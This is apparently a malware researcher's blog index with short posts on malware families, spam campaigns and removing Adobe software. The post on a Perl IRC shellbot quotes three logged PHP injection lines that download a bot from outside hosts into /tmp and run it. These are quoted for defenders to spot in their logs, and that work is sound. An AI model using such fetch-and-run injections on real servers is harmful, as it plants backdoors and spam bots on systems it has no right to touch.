HackerOne button, anyone?

2016.12.04

Hi, folks.

I was unable to find any official “blog button” for HackerOne : https://hackerone.com

So I did one myself. In case you need one too – feel free to copy picture and code to your site.

p.s. I know, it’s look horrible 🙂 Do better and share.

Start copy here:

=============================

<a href=”https://hackerone.com/[Your_H1_Profile]”><img src=”http://ondailybasis.com/blog/wp-content/uploads/2016/12/h1.png” width=”94″ height=”24″ border=”0″ alt=”View [Your_H1_Name]’s profile on HackerOne”></a></br>

=============================

End of copy

Good luck and happy hunting.

D.L.

 

Hoster change rules, so do I :)

2014.10.16

Hi folks
Long time no see 🙂
Recently hoster of this small blog updated it’s server software, and as a result, every file, no matter of file extension, executed according to it content. For example, file knigi.php.txt, that I uploaded almost 3 years ago to illustrate scam with “Google.Files” [long before Google Drive was presented] as a source code, now became act as a valid HTML\PHP file, redirecting customers from my blog to dead landing pages.
Well, that’s unfortunate, but until they’ll fix this – I will remove all html\php samples from here, so no-one get hurt.
By the way – You still interested in malware hunt and new tricks from field?
Stay safe
D.L.

“Perl IRC Shellbot” malware for servers

2014.05.02

Hi 🙂

Recently You maybe saw strange input in server logs…

Something like:

<?php system(“wget http://xxxxx.altervista.org/lol.c -O /tmp/shz;perl /tmp/shz”); ?>

or

<?php system(“wget http://86.125.12.167/lol.c -O /tmp/shz;perl /tmp/shz”); ?>

or

<?php system(“wget http://94.23.42.103/lol.c -O /tmp/shz;perl /tmp/shz”); ?>

 

What does that mean? Well, first of all, Your server potentially vulnerable to the  PHP code injection, at least. Check and update\patch\fix it.

Second – check for processes, that run from /tmp/ folder and with default Apache user.  If there are – You’ve been infected. Take care of it

Now, how exactly this stuff looks like?

Header:

 

header

VT sample, in case You curious: SHA256: 137bf0491f90742a6428a926ab30e29af0d9932389226bae3539c4482e123269

It’s IRC Server-oriented bot, with the main capability to SPAM. Language looks like Portuguese- Brazilian?

It also seen in wild since 2012, at least, Google said 🙂 But older versions had less functionality. And now it back 🙂

That’s how it behave:

1. Script connect to IRC server, protected with credentials [unfortunately, it not available now]

2. Fetch list of the mails, names and addresses for replies from embedded URLs, compose the mail messages and send them in behalf of Apache user.

Among other bot capabilities:

  • Proxy server
  • Socks server
  • Backdoor – command request and  execution

And, since fun is everything in the malware hunting:

One of functions:

func

🙂 he\she is so exited 🙂

It’s not new player on this game field, but recently he\she back in business, so please be aware.

Well, review Your logs and\or update me, in case You have some additional info.

Stay safe

D.L.

Tags :       

Malware hunt – wildfowl to find

2014.01.31

More than twice for the last 24 hours I was asked the non-trivial question:

Where do You find the targets for the malware hunt, if You’re not a  part of the big team, malware researcher or not own a honeynet.

Actually, if You do want to fight a malware, IMHO it is very useful to have a honey-pot system, or, at least, be in security business somehow. It will provide You a non-stop flow of the malicious targets to review. But if  You not, and You still want to help?

Disclamer: All links provided lead to lists of malicious or potentially malicious resources. Do not click there on any link, or don’t run any file, without proper knowledge, env prepared and skills trained.

Well, here are the few links, that  aggregate latest known threats, that You can practice on:

Read more…

Ferret DDoS botnet v2.2 – inside the C&C panel

2013.12.23

Hi all

Today story about Ferret DDoS bot. 🙂

logo

For those who missed it – I started to hunt Ferret at about a month ago:

http://twitter.com/it4sec/status/407021953611210752

And about a week ago a research of Arbor Networks posted with quite nice analysis. Read it HERE.

It’s the end? 🙁 Nope.

Read more…

Adobe – why are You still using it and how to replace it?

2013.10.05

If You not yet aware of, Adobe reported that sources of few of  most used applications on user’s desktops worldwide is stolen.

As a result, we definitely should expect wave of new 0days and more sophisticated attacks. If all previous history of Adobe products not convinced You to remove them from Your machine, I think this is a time 🙂

First of all – do You really need Adobe on Your [or You’re customers] machines?

For Flash: Many sophisticated streaming video services [Youtube as example] allow You to see it content without Flash, based on HTML5 technology for long enough. For others – well, You may consider usage of PepperFlash [same sources, originally]. You may download streaming files from bunch of services and watch them locally [VLC will help You out]. Or – not play games, decline to see ton’s flash ads and switch to non-flash alternatives of Your favourite services. Contact vendors, tell them – You not using Flash anymore.

For Acrobat Reader: You already have plenty of options to choose. Foxit, Nitro, Evince [my recommendations]. Yes, not all of them work with browser, not every application or webservice know to interact with them. Your PC – Your choice 🙂

OK, let’s start:

OS:

Windows:  Uninstall Adobe Flash and Adobe Acrobat Reader from Your computer and reboot.

Linux: use Your package manager. If You have no idea, what I am talking about – You should learn about system You using, bit more. But, for instance – in graphical mode You have Software Center in Ubuntu and PackageKit in Fedora. 🙂

But that’s not all!

Flash Player:

In Firefox You may even disable Flash or Block it execution on page, without Your permission.

To completely disable it: – Tools – Add-ons – Plugins – Choose Shockwave Flash Player and choose “Never Activate”. and then – restart the browser

To block it from execution: You may install nice add-on called FlashBlock, that will allow You to permit execution of Flash application once in a time. Here You still vulnerable, but now It’s totally Your decision, and not “good will” of person who create web page.

In Chrome You’ll need to disable internal Flash plugin.

Enter in browser address bar “chrome://plugins/” with no quotes, press enter and drill down till “Adobe Flash Player” brick will appear. Choose “Disable” and restart the browser.

In Internet Explorer You’ll need to go to Tools – Manage Add-ons and among add-ons find Adobe *, pick each one of them and click “Disable”, and then restart the browser.

Well, maybe after all those changes Internet became less familiar, bit more difficult to find suitable service, but definitely faster, and way more secure for Your specific computer.

Good luck!

D.L.

p.s. Suggestions, replacements and ideas – in comments, will add them with proper credit 🙂

Update1: thx  Mohab Ali for some fixes in text 🙂

Tags :   

JavaScript PluginDetect is in the Past.

2013.07.14

Well, I am sick again, alone at home, so looking for something to dig in…

And, as it appear to be, there is always something interesting happened.

If You familiar with ExploitKits, You know, that major feature of traffic filter is – PluginDetect.

It is JS script with huge amount of features, provided by legit and respectful authors.

Main usage for malicious purposes – detect an outdated plug-ins to serve “working” exploits for successful infection of a victim.

Size  – about 45-65 Kb in plain text, in altered\obfuscated mode can reach 110-130 Kb of JavaScript.

It also known to be part of malicious applications,  and triggered respectively. There are products, that emulate JS, provide fake responses to PluginDetect to bypass it successfully.

Well, bottom line – it’s quite a mess to use it for traffic filtering.

But there are other ways, always…

Read more…

“PowerLoader v2.0 and sons” – communication protocol details

2013.05.29

First of all – for those who do not know, what PowerLoader is:

pl1

From ‘Aliens’ movie. Always wanted one to clean mess in my room at my teen-age.

But – we will talk about another Power Loader – v2.0

pl2

Read more…

“NY TRAFFIC TICKET” SPAM is back

2013.03.27

Well, it was gone for a while, and here it back 🙂

Email message sample:

mail1

 

Actually code looks like:

mail3

 

Attack, actually, run for about 48 hours already at least. You may see traces of it on URLQuery [36 entries by now]

When clicked – lead to BHEK2

mail2

 

BHEK2 payload – Cridex [22/46] and Fareit.

Second binary is interesting one, yes 🙂 Wait for updates.

Stay safe!

D.L.

Tags :   

Darkleech – malicious Apache mod anti-forensics – client-side.

2013.03.18

I wrote about Darkleech last year, and one of questions remain  – among anti-forensics features of it, that seller declared, were:

– frame delivered to unique users only, no frame on repeat. 

So – How it looks like for victim and how implemented?

Since than Linux/Chapro.A was posted in SecLists and  analysed by Kaspersky and ESET.

Afterwards Eric Romang provided some details, that it appear to be version of Darkleech module.

And here it appear again: UnixFreaxJP blog report about massive attack on Japanese segment of Internet.

Well, It’s time to see, is it DarkLeech and how anti-forensics implemented there from client PoV 🙂

Ok. Let’s see on any of servers that in list:

Read more…